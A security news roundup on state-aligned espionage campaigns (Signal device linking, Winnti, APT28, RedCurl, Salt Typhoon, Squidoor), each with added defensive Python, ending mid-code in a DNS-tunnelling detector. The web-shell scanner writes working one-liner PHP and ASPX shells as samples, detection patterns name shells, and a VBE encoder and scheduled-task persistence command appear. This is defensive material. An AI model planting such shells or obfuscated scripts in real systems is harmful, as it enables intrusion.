Russian state-aligned hackers are exploiting the legitimate "Linked Devices" feature of the Signal messaging app to conduct cyber-espionage against accounts of interest. Google's Threat Intelligence Group (GTIG) has uncovered a series of these campaigns, which rely on phishing rather than on any weakness in Signal's cryptography: targets are tricked into scanning a malicious device-linking QR code, in some cases one swapped into what looks like a group invite, so that their account is linked to a device controlled by the attacker.

Once the link is established, the attacker's device receives the victim's messages without the victim's own phone or computer being compromised, which is why the campaigns concentrate on Ukrainian military personnel, government officials and other individuals of interest to Russia's intelligence services.
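
The whole attack hinges on what a scanned QR code actually encodes, so a useful check for anyone triaging suspicious "invites" (or building a mail or chat gateway filter) is to classify the decoded payload. The example below is added for this page; it is not from GTIG or Signal. It assumes the URI shapes used by Signal clients, `sgnl://linkdevice?uuid=...&pub_key=...` for device linking and `https://signal.group/#...` for group invites, and the sample payloads, UUID and key are constructed placeholders.

```python
"""Classify a link (for example the payload decoded from a QR code) as a Signal
device-linking URI or as something benign such as a group invite. Example code
added for this page, not from Google's Threat Intelligence Group or Signal.
Assumed URI shapes: sgnl://linkdevice?uuid=...&pub_key=... (device linking),
https://signal.group/#... (group invite), https://signal.me/... (contact link).
The sample payloads, UUID and key below are constructed placeholders."""
import re
from urllib.parse import parse_qs, urlsplit

UUID_RE = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", re.I)


def classify_signal_link(payload):
    """Return a dict describing what scanning or opening this payload would do."""
    parts = urlsplit(payload.strip())
    scheme, host = parts.scheme.lower(), parts.netloc.lower()
    if scheme == "sgnl" and host == "linkdevice":
        q = parse_qs(parts.query)
        uuid = q.get("uuid", [""])[0]
        # The linking URI names the new device and carries its public key; once the
        # user approves it in the app, that device receives the account's messages.
        return {"kind": "device_link", "uuid": uuid,
                "well_formed": bool(UUID_RE.match(uuid)) and "pub_key" in q}
    if scheme == "https" and host == "signal.group" and parts.fragment:
        return {"kind": "group_invite"}
    if scheme == "https" and host == "signal.me":
        return {"kind": "contact_link"}
    return {"kind": "other"}


def flag_linking_payloads(payloads):
    """Triage helper: indices of payloads that would enrol a new linked device."""
    return [i for i, p in enumerate(payloads)
            if classify_signal_link(p)["kind"] == "device_link"]


# Constructed payloads: a group invite, a device-linking URI dressed up as an
# invite, and an unrelated link. The UUID and key are placeholders.
SAMPLE_PAYLOADS = [
    "https://signal.group/#CjQKIHRlc3Rncm91cGludml0ZQ",
    "sgnl://linkdevice?uuid=0f0e0d0c-0b0a-4908-8706-050403020100"
    "&pub_key=QUJDREVGR0hJSktMTU5PUA%3D%3D",
    "https://example.invalid/join",
]
```

A device-linking URI arriving in anything that presents itself as a group invite is the lure; the only legitimate reason to scan one is that you yourself are setting up Signal Desktop or another secondary device. The matching user-side check is to review Settings > Linked Devices periodically and unlink anything unrecognised.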

Recommended read:
References :
  • cyberinsider.com: Russian Hackers Exploit Signal’s Linked Devices to Spy on Users
  • BleepingComputer: Russian threat actors have been launching phishing campaigns that exploit the legitimate "Linked Devices" feature in the Signal messaging app to gain unauthorized access to accounts of interest.
  • CyberInsider: Google's Threat Intelligence Group (GTIG) has uncovered a series of cyber-espionage campaigns by Russian state-aligned hackers targeting Signal Messenger accounts.
  • securebulletin.com: Russia-Aligned actors intensify targeting of Signal Messenger
  • securityaffairs.com: Russia-linked threat actors exploit Signal messenger
  • Talkback Resources: Russian Groups Target Signal Messenger in Spy Campaign [app] [social]
  • cloud.google.com: Russian Threat Actors targeting Signal messenger accounts used by individuals of interest to Russia's intelligence services. The goal seems to be espionage or military reconnaissance in context of war in Ukraine.
  • bsky.app: Russian Threat Actors targeting Signal messenger accounts used by individuals of interest to Russia's intelligence services. The goal seems to be espionage or military reconnaissance in context of war in Ukraine. https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger
  • cyble.com: Russia-Linked Actors Exploiting Signal Messenger's "Linked Devices" Feature for Espionage in Ukraine
  • Talkback Resources: State-aligned threat actors, particularly from Russia, are targeting Signal Messenger accounts through phishing campaigns to access sensitive government and military communications, exploiting the app's "linked devices" feature for eavesdropping on secure conversations.
  • cyberscoop.com: Russian-aligned threat groups dupe Ukrainian targets via Signal
  • Talkback Resources: Signals of Trouble: Multiple Russia-Aligned Threat Actors Actively Targeting Signal Messenger [social]
  • Threats | CyberScoop: Russia-aligned threat groups dupe Ukrainian targets via Signal
  • www.onfocus.com: Google Threats on Signals of Trouble
  • cyberriskleaders.com: Russian Hackers Targeting Ukrainian Signal Users with Malicious QR Codes
  • arstechnica.com: Russia-aligned hackers are targeting Signal users with device-linking QR codes Swapping QR codes in group invites and artillery targeting are latest ploys.
  • MeatMutts: Google Warns of Russian Hacking Campaign Targeting Ukraine’s Military on Signal
  • Talkback Resources: Hackers Exploit Signal's Linked Devices Feature to Hijack Accounts via Malicious QR Codes
  • thecyberexpress.com: Russian state-sponsored hackers are ramping up efforts to compromise Signal messenger accounts, particularly those used by Ukrainian military personnel, government officials, and other key figures.

info@thehackernews.com (The Hacker News)@The Hacker News //
The Winnti Group, a China-based threat actor also known as APT41, is actively targeting Japanese organizations within the manufacturing, materials, and energy sectors. Researchers at LAC's Cyber Emergency Center identified a new campaign dubbed "RevivalStone," which employs an advanced version of the Winnti malware. This updated malware exhibits enhanced capabilities and sophisticated evasion techniques, posing a significant threat to the targeted industries.

The RevivalStone intrusion chain starts with SQL injection against internet-facing Enterprise Resource Planning (ERP) systems. The attackers then drop web shells such as China Chopper to gain a foothold, which they use for reconnaissance, credential harvesting, and lateral movement inside the network. The updated Winnti implant adds AES and ChaCha20 encryption, decryption keys derived from the victim host's IP and MAC addresses (so a sample copied off the infected machine does not decrypt elsewhere), a kernel-level rootkit for covert data exfiltration, and code obfuscation to evade endpoint detection and response (EDR) products.
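Because the foothold in this chain is a web shell dropped into an ERP web root, the first thing to sweep for is the China Chopper family's one-line shells. The following is an added Python example (my own scanner, not LAC's tooling or anything from the campaign) that walks a web root and flags the well-known public one-liner patterns; the sample files it writes into a temporary directory are constructed, not the shells LAC observed.

```python
import os
import re
import tempfile

# Public signatures for China Chopper-style one-liners and close relatives.
SHELL_PATTERNS = {
    "php-eval-request":   re.compile(r"@?\b(eval|assert)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.I),
    "php-base64-request": re.compile(r"base64_decode\s*\(\s*\$_(POST|GET|REQUEST)\s*\[", re.I),
    "aspx-eval-unsafe":   re.compile(r'eval\s*\(\s*Request\.Item\s*\[[^\]]*\]\s*,\s*"unsafe"\s*\)', re.I),
    "jsp-exec-param":     re.compile(r"Runtime\.getRuntime\(\)\.exec\s*\(.*request\.getParameter\(", re.I),
}
WEB_EXT = {".php", ".phtml", ".php5", ".aspx", ".ashx", ".asmx", ".jsp", ".jspx"}


def scan_text(name: str, text: str) -> list:
    """Return (signature, line_no, snippet) for every pattern hit in one file."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for sig, rx in SHELL_PATTERNS.items():
            if rx.search(line):
                hits.append((sig, line_no, line.strip()[:80]))
    # A tiny file whose only job is to evaluate request input is the classic profile.
    if hits and len(text) < 200:
        hits.append(("one-liner-shell", 0, f"{name}: {len(text)} bytes"))
    return hits


def scan_webroot(root: str) -> dict:
    """Walk a web root, scan every server-side script, return {relative path: hits}."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if os.path.splitext(fn)[1].lower() not in WEB_EXT:
                continue
            path = os.path.join(dirpath, fn)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hits = scan_text(path, fh.read())
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


# Constructed samples: a PHP and an ASPX one-liner shell plus a benign page.
SAMPLES = {
    "upload/tmp.php": "<?php @eval($_POST['pass']); ?>",
    "erp/help.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "erp/index.php": "<?php\n$id = (int)$_GET['id'];\necho htmlspecialchars($row['name']);\n",
}


def build_sample_root() -> str:
    """Write the constructed samples into a temporary web root and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, body in SAMPLES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, hits in scan_webroot(build_sample_root()).items():
        print(path, hits)
```

Pair the scan with file-system timestamps: a server-side script in an upload or temp directory that is younger than the last deployment is worth a look even when no signature fires, since operators routinely rename the request parameter or wrap the eval in a second layer.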

Recommended read:
References :
  • www.lac.co.jp: Researchers from LAC's Cyber Emergency Center analyze the "RevivalStone" campaign operated by China-based threat group Winnti
  • cyberpress.org: Winnti Hackers Target Japanese Organizations with Advanced Malware
  • Talkback Resources: The content provides an in-depth analysis of the Winnti Group's activities, including the RevivalStone campaign, tools used such as WinntiWebShell and China Chopper, and techniques like AES encryption, Winnti RAT, and Winnti Rootkit, with a focus on detection and prevention strategies.
  • Virus Bulletin: Researchers from LAC's Cyber Emergency Center analyse the "RevivalStone" campaign operated by China-based threat group Winnti
  • securityaffairs.com: SecurityAffairs: China-linked APT group Winnti targets Japanese organizations since March 2024
  • The Hacker News: Winnti APT41 Targets Japanese Firms in RevivalStone Cyber Espionage Campaign
  • Talkback Resources: China-linked APT group Winnti targeted Japanese organizations
  • Talkback Resources: Winnti APT41 Targets Japanese Firms in RevivalStone Cyber Espionage Campaign
  • www.scworld.com: Winnti attacks set sights on Japan

Pierluigi Paganini@securityaffairs.com //
Espionage tools typically associated with China-linked threat actors have been detected in a November 2024 RA World ransomware attack against an Asian software and services firm. According to reports, the attackers initially focused on cyberespionage, targeting a Southeastern European country's foreign ministry in July 2024 before setting their sights on the Asian firm. The compromise of the software company involved exploiting a Palo Alto Networks PAN-OS flaw and pilfering Amazon AWS S3 bucket data and credentials.

The toolset deployed in the RA World attack, including a PlugX malware variant, has previously been seen only in classic espionage operations by China-linked actors, where it served to maintain a persistent presence in targeted organizations and install backdoors. Seeing it used to stage ransomware marks a departure from intelligence-driven activity toward financially motivated crime, and raises the question of whether espionage operators are moonlighting or deliberately diversifying.

Recommended read:
References :
  • Information Security Buzz: Espionage actors linked to China may be diversifying their operations, as new evidence points to the use of espionage tools in a recent ransomware attack against a South Asian software and services company.
  • securityaffairs.com: A November 2024 RA World ransomware attack on an Asian software firm used a tool linked to China-linked threat actors.
  • www.scworld.com: After initially focusing on cyberespionage in an attack against a Southeastern European country's foreign ministry in July, threat actors aimed to compromise the Asian firm by exploiting a Palo Alto Networks PAN-OS flaw and pilfering Amazon AWS S3 bucket data and credentials before launching RA World ransomware.
  • Broadcom Software Blogs: Chinese state-sponsored hacking tools detected in recent RA World #ransomware attack. Possible moonlighting activity combines #APT and criminal tactics.

@Talkback Resources //
Cybersecurity researchers have detailed the multi-layer obfuscation that APT28, a Russian state-sponsored threat actor, uses in its HTA Trojan. The investigation covers espionage campaigns targeting Central Asia and Kazakhstan's diplomatic relations and shows how each layer is designed to evade detection. Central to the delivery mechanism is Microsoft's VBE encoding (the Windows Script Encoder, screnc.exe) embedded in HTA files: it transforms VBScript and JavaScript into an encoded form that the Windows script engines still execute but that conceals the script's logic from a casual reader.

The investigation uncovered that the malware leverages Windows’ vbscript.dll to generate embedded strings dynamically during execution. By analyzing these strings and their interaction with memory addresses, researchers were able to reconstruct the original VBScript payload hidden within the HTA file. Using publicly available tools like “vbe-decoder.py,” they successfully deobfuscated the encoded scripts, exposing the final malicious payload designed for espionage activities. This discovery underscores the need for robust malware analysis capabilities and proactive threat intelligence sharing within the cybersecurity community.
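The Script Encoder layer is a fixed substitution, so it is worth seeing how little it actually hides. Below is an added Python example (my own implementation, not the researchers' vbe-decoder.py and not APT28 code) that locates the #@~^...==^#~@ blocks in an HTA and decodes them. The substitution tables and the 64-entry pick sequence are reproduced from the public decoders the passage refers to; the encoder is included only so the block can build its own sample, and the HTA it decodes is constructed, not an APT28 artifact.

```python
import re

# Windows Script Encoder tables as reproduced in public decoders (decode-vbe.py,
# vbe-decoder.py). Column c maps encoded byte 0x20..0x7F (stored at byte-0x20)
# to the plaintext byte; TAB has its own row. '<', '>' and '@' never appear raw
# in an encoded stream (they are escaped), so slots 0x3C/0x3E/0x40 are fillers.
_COL = [bytes.fromhex(h) for h in (
    "2E477A56426A2F26494134325B7672433839704568714F09624423754A7E4A5E"
    "40774A615D224B6F4E3B4C50672A7D74542B2D2C306E6B66352521644D52633F"
    "7B7829287359337F6D55537C3A5F65465831696C5A48275C3D24793760512036",
    "2D755260715E495C627D2936207C7A7F6B63332B68516676316454434C3A4C7E"
    "4C452C2A7427374479592F6F26726A397B3F387767534734785D30235A5B6C48"
    "5570692E4C21244E5009567335614B583B57226D4D2528464A32413D5F4F4265",
    "323021295B38333D583A3565395C5673664E456B6259785E7D4A6D7141604153"
    "40422748727531374D5222546A47642D207F2E4C5D7E6C6F797443267625242B"
    "28234134092A443F773B55696163506751494F46687C36706E7A2F5F4B5A2C57",
)]
_TAB = b"\x57\x6E\x7B"   # plaintext for an encoded TAB, per column
# Which column decodes the i-th single-byte character of the stream (i mod 64).
_PICK = [int(c) for c in
         "0120121221210212021200122102122100212120200120210212001220012021"]
_ESCAPES = {"@&": "\n", "@#": "\r", "@*": ">", "@!": "<", "@$": "@"}
_TRANSLATED = {9} | {b for b in range(32, 128) if b not in (0x3C, 0x3E, 0x40)}
# Framing is "#@~^" + 6 chars + "==" + body + 6 chars + "==^#~@"; decoders treat
# the two 6-character fields as opaque, and so does this example.
_BLOCK = re.compile(r"#@~\^.{6}==(.*?).{6}==\^#~@", re.DOTALL)


def decode_body(body: str) -> str:
    """Decode the text between the #@~^XXXXXX== header and the XXXXXX==^#~@ trailer."""
    for esc, plain in _ESCAPES.items():   # escapes stand for bytes that cannot be raw
        body = body.replace(esc, plain)
    out, index = [], -1
    for ch in body:
        b = ord(ch)
        if b < 128:
            index += 1                    # high characters do not advance the pick position
        if b in _TRANSLATED:
            col = _PICK[index % 64]
            b = _TAB[col] if b == 9 else _COL[col][b - 32]
        out.append(chr(b))
    return "".join(out)


def encode_body(plain: str) -> str:
    """Inverse of decode_body with the same tables; used here only to build the sample."""
    inverse = [{} for _ in range(3)]
    for col in range(3):
        for b in _TRANSLATED:
            inverse[col][_TAB[col] if b == 9 else _COL[col][b - 32]] = b
    rev = {v: k for k, v in _ESCAPES.items()}
    out, index = [], -1
    for ch in plain:
        b = ord(ch)
        if b < 128:
            index += 1
        if ch in rev:
            out.append(rev[ch])
        elif b < 128:
            out.append(chr(inverse[_PICK[index % 64]][b]))   # KeyError for other control chars
        else:
            out.append(ch)
    return "".join(out)


def decode_scripts(text: str) -> list:
    """Decode every encoded block found in an HTA/VBE/JSE file."""
    return [decode_body(body) for body in _BLOCK.findall(text)]


# Constructed sample (not an APT28 artifact): a harmless VBScript body encoded
# with the tables above and embedded the way an HTA dropper embeds it.
SAMPLE_PLAIN = ('Set sh = CreateObject("WScript.Shell")\r\n'
                'If sh.ExpandEnvironmentStrings("%TEMP%") <> "" Then\r\n'
                '\tsh.Popup "decoded @ " & Now, 5\r\n'
                'End If')
SAMPLE_HTA = ('<html><head><hta:application id="demo"/>\n'
              '<script language="VBScript.Encode">'
              '#@~^AAAAAA==' + encode_body(SAMPLE_PLAIN) + 'AAAAAA==^#~@'
              '</script></head><body></body></html>')

if __name__ == "__main__":
    for script in decode_scripts(SAMPLE_HTA):
        print(script)
```

The point for analysts is that VBE is encoding, not encryption: the tables are public and position-dependent only modulo 64, so once the block is extracted from the HTA the payload is recovered statically, without running the script or touching vbscript.dll.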

Recommended read:
References :
  • Virus Bulletin: Cisco Talos researcher Joey Chen describes how Lotus Blossom uses Sagerunex and other hacking tools for post-compromise activities. The espionage operation targets government, manufacturing, telecommunications & media organizations from Philippines, Vietnam, Hong Kong & Taiwan.
  • gbhackers.com: Lotus Blossom Hacker Group Uses Dropbox, Twitter, and Zimbra for C2 Communications
  • Talkback Resources: Lotus Blossom espionage group targets multiple industries with different versions of Sagerunex and hacking tools
  • www.cysecurity.news: Cisco Talos Uncovers Lotus Blossom’s Multi-Campaign Cyber Espionage Operations
  • Cyber Security News: Researchers Unveil APT28’s Advanced HTA Trojan Obfuscation Tactics in Detail
  • gbhackers.com: Researchers Unveil APT28’s Advanced HTA Trojan Obfuscation Tactics
  • securityaffairs.com: Chinese Lotus Blossom APT targets multiple sectors with Sagerunex backdoor

Veronika Telychko@SOC Prime Blog //
The RedCurl/EarthKapre APT group is actively engaged in corporate espionage, particularly targeting the legal sector. The group uses sophisticated techniques to infiltrate organizations, beginning with phishing emails disguised as Indeed-themed job applications. These emails contain malicious attachments designed to trick victims into downloading ZIP archives containing ISO image files that mimic CVs. Once the ISO image is mounted, the victim unknowingly executes a signed Adobe executable, which then sideloads the EarthKapre loader.

This loader, delivered via a legitimate Adobe executable, is the core of the attack. It establishes command and control through Cloudflare Workers. The malware uses encryption to protect its payloads and sets up a scheduled task to maintain persistence on the compromised system. The eSentire Threat Response Unit (TRU) identified this attack targeting law firms and legal services.
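The two behaviours in this chain that an endpoint telemetry pipeline can key on are a signed vendor binary loading an unsigned DLL from an unusual location (the sideload) and a scheduled task pointing back at that location (the persistence). Here is an added Python example (my own heuristic, not eSentire's detection content) that correlates the two over Sysmon-style image-load and process-creation records. The field names and the events, including the executable and DLL names, are constructed for the example; the real campaign's file names are not reproduced here.

```python
import ntpath
import re

# Constructed record shapes (field names chosen for this example):
#   ImageLoad:     Image, ImageLoaded, ImageSigned, DllSigned
#   ProcessCreate: Image, CommandLine
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# User-writable locations plus any non-C: drive letter (a mounted ISO shows up as one).
USER_WRITABLE = re.compile(r"^(c:\\users\\|c:\\programdata\\|c:\\temp\\|[d-z]:\\)")
SCHTASKS_TR = re.compile(r'/tr\s+"?([^"]+?)"?(?=\s+/|$)', re.I)


def _dir(path: str) -> str:
    return ntpath.dirname(path.lower())


def sideload_candidates(events) -> list:
    """Signed EXE outside the system dirs loading an unsigned DLL from its own directory."""
    out = []
    for ev in events:
        if ev["type"] != "ImageLoad":
            continue
        img, dll = ev["Image"].lower(), ev["ImageLoaded"].lower()
        if not ev["ImageSigned"] or ev["DllSigned"]:
            continue
        if img.startswith(SYSTEM_DIRS) or not USER_WRITABLE.match(img):
            continue
        if _dir(img) == _dir(dll):
            out.append(ev)
    return out


def persistence_from_dir(events, directory: str) -> list:
    """schtasks /create command lines whose /tr target lives in the given directory."""
    hits = []
    for ev in events:
        if ev["type"] != "ProcessCreate" or "schtasks" not in ev["Image"].lower():
            continue
        if "/create" not in ev["CommandLine"].lower():
            continue
        m = SCHTASKS_TR.search(ev["CommandLine"])
        if m and _dir(m.group(1).strip()) == directory:
            hits.append(ev["CommandLine"])
    return hits


def triage(events) -> list:
    """One alert per sideload candidate; severity rises when persistence points at it."""
    alerts = []
    for ev in sideload_candidates(events):
        tasks = persistence_from_dir(events, _dir(ev["Image"]))
        alerts.append({"image": ev["Image"], "dll": ev["ImageLoaded"],
                       "severity": "high" if tasks else "medium", "tasks": tasks})
    return alerts


# Constructed events: a sideload from a mounted ISO (drive E:), the same DLL name
# loaded legitimately from Program Files, a benign temp-dir process, and a task.
SAMPLE_EVENTS = [
    {"type": "ImageLoad", "Image": r"E:\CV_Smith\signed_vendor.exe",
     "ImageLoaded": r"E:\CV_Smith\netutils.dll", "ImageSigned": True, "DllSigned": False},
    {"type": "ImageLoad", "Image": r"C:\Program Files\Vendor\signed_vendor.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\netutils.dll", "ImageSigned": True, "DllSigned": True},
    {"type": "ImageLoad", "Image": r"C:\Users\alice\AppData\Local\Temp\setup.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "ImageSigned": True, "DllSigned": True},
    {"type": "ProcessCreate", "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn "UpdaterTask" /tr "E:\CV_Smith\signed_vendor.exe" /sc minute /mo 30'},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The "same directory" test is what separates a sideload from ordinary unsigned-DLL noise: a signed binary that has been copied next to a DLL it was never shipped with is the whole trick, and it is visible before the loader ever reaches out to its Cloudflare Workers C2.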

Recommended read:
References :
  • Information Security Buzz: eSentire’s Threat Response Unit (TRU) has uncovered a new cyber espionage campaign leveraging a legitimate Adobe executable to sideload the EarthKapre/RedCurl loader.
  • SOC Prime Blog: The nefarious cyber-espionage hacking collective tracked as EarthKapre or RedCurl APT has resurfaced to target legal sector organizations using Indeed-themed phishing.
  • Virus Bulletin: Infosec Exchange post summarizing eSentire's investigation into RedCurl/EarthKapre APT targeting legal services.
  • Talkback Resources: Unraveling the Many Stages and Techniques Used by RedCurl/EarthKapre...
  • Know Your Adversary: 046. RedCurl Abuses PowerShell for Collection and Exfiltration: Detection Opportunities
  • socprime.com: RedCurl/EarthKapre APT Attack Detection: A Sophisticated Cyber-Espionage Group Uses a Legitimate Adobe Executable to Deploy a Loader
  • www.esentire.com: eSentire researchers summarise a recent investigation into an attack by the RedCurl/EarthKapre APT against an organization within the legal services industry. The group primarily targets private-sector organizations with a focus on corporate espionage.
  • securityonline.info: Stealth Attack: EarthKapre Leverages Cloud and DLL Sideloading for Data Exfiltration
  • Talkback Resources: eSentire's TRU team identified and responded to an attack targeting the Law Firms & Legal Services industry involving the EarthKapre/RedCurl loader being sideloaded through a legitimate Adobe executable, utilizing Cloudflare Workers for C2 infrastructure.
  • Talkback Resources: Unraveling the Many Stages and Techniques Used by RedCurl/EarthKapre… [net] [mal]
  • securityaffairs.com: eSentire report on the RedCurl/EarthKapre APT's campaign targeting law firms, using a legitimate Adobe executable for the loader.
  • Kim Zetter: eSentire's TRU team identified and responded to an attack targeting the Law Firms & Legal Services industry involving the EarthKapre/RedCurl loader being sideloaded through a legitimate Adobe executable, utilizing Cloudflare Workers for C2 infrastructure.

drewt@secureworldexpo.com (Drew Todd)@SecureWorld News //
The Chinese state-sponsored hacking group Salt Typhoon is expanding its espionage campaign, targeting U.S. telecommunication providers and other networks globally. The group, active since at least 2019, has been breaching major companies like AT&T, Verizon, and Lumen Technologies. Between December 2024 and January 2025, Salt Typhoon compromised additional telecom networks across the globe. The attacks involve a custom utility called JumbledPath, used to stealthily monitor network traffic and potentially capture sensitive data.

Salt Typhoon gains initial access through stolen credentials and exploiting vulnerabilities in Cisco routers. Specifically, they target internet-exposed Cisco network routers, leveraging CVE-2023-20198 and CVE-2023-20273 to escalate privileges and gain root access. Once inside, they extract credentials by intercepting authentication traffic, modify network configurations, and create hidden accounts to maintain persistent access. The group's objectives include intercepting sensitive communications, tracking political activists, and stealing research from academic institutions.
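The persistence techniques named here, hidden local accounts and modified network configuration, are exactly what a running-config diff against a golden baseline surfaces. The following is an added Python example (my own drift checker, not Cisco or Talos tooling) that compares two IOS/IOS XE-style configurations and reports changes to the lines that matter for this campaign: local users, the HTTP web UI through which CVE-2023-20198 is reached, traffic capture, tunnels and AAA. Both configurations are constructed samples.

```python
import re

# Config lines worth baselining on an edge router (selection is this example's).
WATCH = {
    "local-user":  re.compile(r"^username\s+\S+"),
    "http-server": re.compile(r"^ip http (secure-)?server"),
    "capture":     re.compile(r"^monitor capture\s"),
    "tunnel":      re.compile(r"^interface Tunnel"),
    "aaa":         re.compile(r"^aaa (authentication|authorization)"),
    "tacacs-key":  re.compile(r"^tacacs(-server)? .*key"),
}


def interesting_lines(config: str) -> dict:
    """Map category -> set of stripped config lines that match a watched pattern."""
    found = {cat: set() for cat in WATCH}
    for raw in config.splitlines():
        line = raw.strip()
        for cat, rx in WATCH.items():
            if rx.match(line):
                found[cat].add(line)
    return found


def drift(baseline: str, current: str) -> dict:
    """Watched lines added to or removed from the live config relative to the baseline."""
    b, c = interesting_lines(baseline), interesting_lines(current)
    report = {}
    for cat in WATCH:
        added, removed = sorted(c[cat] - b[cat]), sorted(b[cat] - c[cat])
        if added or removed:
            report[cat] = {"added": added, "removed": removed}
    return report


def privileged_accounts(config: str) -> list:
    """Local usernames with privilege 15: the first thing to reconcile against the IdP."""
    return [m.group(1) for m in re.finditer(r"^username\s+(\S+)\s+privilege 15", config, re.M)]


# Constructed golden config and a later running-config with the kinds of changes
# the reports describe (extra privileged user, web UI enabled, capture, tunnel).
BASELINE = """\
hostname edge-rtr-1
username netops privilege 15 secret 9 $9$REDACTED
aaa authentication login default group tacacs+ local
no ip http server
ip http secure-server
interface GigabitEthernet0/0/0
 ip address 203.0.113.2 255.255.255.252
"""
CURRENT = """\
hostname edge-rtr-1
username netops privilege 15 secret 9 $9$REDACTED
username svc_backup privilege 15 secret 9 $9$ALSOREDACTED
aaa authentication login default group tacacs+ local
ip http server
ip http secure-server
interface Tunnel100
 tunnel source GigabitEthernet0/0/0
 tunnel destination 198.51.100.77
monitor capture CAP interface GigabitEthernet0/0/0 both
interface GigabitEthernet0/0/0
 ip address 203.0.113.2 255.255.255.252
"""

if __name__ == "__main__":
    for cat, change in drift(BASELINE, CURRENT).items():
        print(cat, change)
    print("privilege-15 users:", privileged_accounts(CURRENT))
```

Run it from a scheduled job that pulls running-config over the management network, and treat any added username or newly enabled `ip http server` on an internet-facing device as an incident rather than a change-management ticket.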

Recommended read:
References :
  • bsky.app: The Chinese state-sponsored Salt Typhoon hacking group uses a custom utility called JumbledPath to stealthily monitor network traffic and potentially capture sensitive data in cyberattacks on U.S. telecommunication providers.
  • BleepingComputer: The Chinese state-sponsored Salt Typhoon hacking group uses a custom utility called JumbledPath to stealthily monitor network traffic and potentially capture sensitive data in cyberattacks on U.S. telecommunication providers.
  • securityaffairs.com: Salt Typhoon used custom malware JumbledPath to spy U.S. telecom providers
  • www.bleepingcomputer.com: The Chinese state-sponsored Salt Typhoon hacking group uses a custom utility called JumbledPath to stealthily monitor network traffic and potentially capture sensitive data in cyberattacks on U.S. telecommunication providers.
  • Anonymous: The Chinese state-sponsored Salt Typhoon hacking group uses a custom utility called JumbledPath to stealthily monitor network traffic and potentially capture sensitive data in cyberattacks on U.S. telecommunication providers.
  • Carly Page: The Chinese state-sponsored Salt Typhoon hacking group uses a custom utility called JumbledPath to stealthily monitor network traffic and potentially capture sensitive data in cyberattacks on U.S. telecommunication providers.
  • Blog: New Details: Salt Typhoon Used Leaked Creds in Telecom Attack
  • SecureWorld News: Chinese cyber espionage group Salt Typhoon has made headlines in the last year, breaching major telecommunications providers, including AT&T, Verizon, and Lumen Technologies.
  • cyberscoop.com: Salt Typhoon gained initial access to telecoms through Cisco devices
  • www.bleepingcomputer.com: Chinese hackers breach more U.S. telecoms via unpatched Cisco routers
  • gbhackers.com: Gbhackers news on Salt Typhoon Hackers Exploit Cisco Vulnerability
  • www.the420.in: The 420 news on Chinese Hackers Target US Telecom Giants

@www.bleepingcomputer.com //
Chinese APT groups are actively targeting U.S. telecom providers and European healthcare organizations using sophisticated cyberattacks. The attacks involve custom malware, such as JumbledPath used by Salt Typhoon to spy on U.S. telecom networks, and the exploitation of vulnerabilities like the Check Point flaw (CVE-2024-24919). These campaigns are characterized by the deployment of advanced tools like ShadowPad and NailaoLocker ransomware, indicating a blend of espionage and financially-motivated cybercrime.

These threat actors gain initial access through exploited vulnerabilities, then move laterally within the networks using techniques like RDP to obtain elevated privileges. The attackers then deploy ShadowPad and PlugX, before deploying the NailaoLocker ransomware in the final stages, encrypting files and demanding Bitcoin payments. These findings highlight the evolving tactics of Chinese APT groups and the challenges in attributing these attacks, given the blurring lines between state-sponsored espionage and financially driven operations.

Recommended read:
References :

Aman Mishra@gbhackers.com //
A new malware campaign, named "Squidoor," is targeting governments, defense, telecommunications, education, and aviation sectors in Southeast Asia and South America. Researchers at Palo Alto Networks, Lior Rochberger and Tom Fakterman, have analyzed the backdoor, attributing it to a suspected Chinese threat actor known as CL-STA-0049. Squidoor is a multi-vector modular backdoor designed for stealth and adaptability.

Squidoor abuses cdb.exe and can carry command and control (C2) traffic over the Outlook API, DNS, or ICMP tunneling, so blocking one channel does not cut the operator off. Attackers gain initial access by exploiting vulnerabilities and deploying web shells. The backdoor is delivered through weaponized Excel documents and drops a stealthy RAT and additional payloads. It relies on LOLBAS techniques, such as using Microsoft's Console Debugger (cdb.exe) to load shellcode directly into memory, to bypass traditional antivirus detection.
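Of the three C2 channels, DNS is the one most organizations already log, so here is an added Python example (my own heuristic, not Palo Alto Networks' detection logic) that profiles resolver logs per parent domain and flags the tunnelling signature: many unique, long, high-entropy subdomains under one domain. The log lines are constructed, the thresholds are starting points rather than values from the Squidoor analysis, and the parent-domain split uses the last two labels, which is adequate for the sample but should be a public-suffix lookup in production.

```python
import base64
import hashlib
import math
from collections import defaultdict


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's empirical character distribution."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))


def split_name(qname: str):
    """(parent, subdomain) using the last two labels as the parent (simplification)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def profile(lines) -> dict:
    """Per parent domain: unique subdomains, mean subdomain length/entropy, odd-type share."""
    per = defaultdict(lambda: {"subs": set(), "len": 0, "ent": 0.0, "odd": 0, "n": 0})
    for line in lines:                                   # "<ts> <client> <qtype> <qname>"
        _ts, _client, qtype, qname = line.split()
        parent, sub = split_name(qname)
        p = per[parent]
        p["n"] += 1
        p["subs"].add(sub)
        p["len"] += len(sub)
        p["ent"] += shannon_entropy(sub.replace(".", ""))
        p["odd"] += qtype in ("TXT", "NULL", "CNAME")    # common carriers for downstream data
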